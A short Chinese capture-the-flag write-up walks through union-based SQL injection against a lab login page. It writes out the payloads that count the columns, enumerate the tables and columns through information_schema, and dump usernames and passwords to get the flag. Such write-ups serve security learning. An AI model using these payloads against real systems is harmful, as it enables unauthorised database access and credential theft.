这是一道比较标准的SQL注入题目,首先打开靶机,看到登录页,输入用户名、密码。
首先试一下单引号,成功触发,说明是通过单引号闭合,
发现SQL语句报错,我们把注释符换成#号,成功登入
这里我想偷懒,用堆叠注入,失败 ?username=admin';show databases;#
此路不通,用联合查询判断原始查询的列数 ?username=admin' UNION select NULL,NULL,NULL# 当输入3个NULL时成功,原始查询有3列。
接下来把admin替换掉(因为刚好数据库中存在admin,所以能查询出数据,影响判断) ?username=11' UNION select 1,2,3#
可以看到2 3是注入点,首先我们看看数据库 ?username=11'UNION select 1,database(),3#
可以看到有个geek数据库,继续查询数据库中的表 ?username=11'union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()#
奇怪的实这里 where table_schema=database()替换成 where tabel_schema=geek会报错,不知道是不是语法的原因,暂时先不管了。
通过上面的查询 ,可以看到有2个表,geekuser表,l0ve1ysq1表。我们继续看l0ve1ysq1表的信息。 ?username=11'union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
可以看到l0ve1ysq1表中有 id username password,继续查询表内的信息 ?username=11'union select 1,database(),group_concat(id,username,password) from l0ve1ysq1#
这样flag就拿到了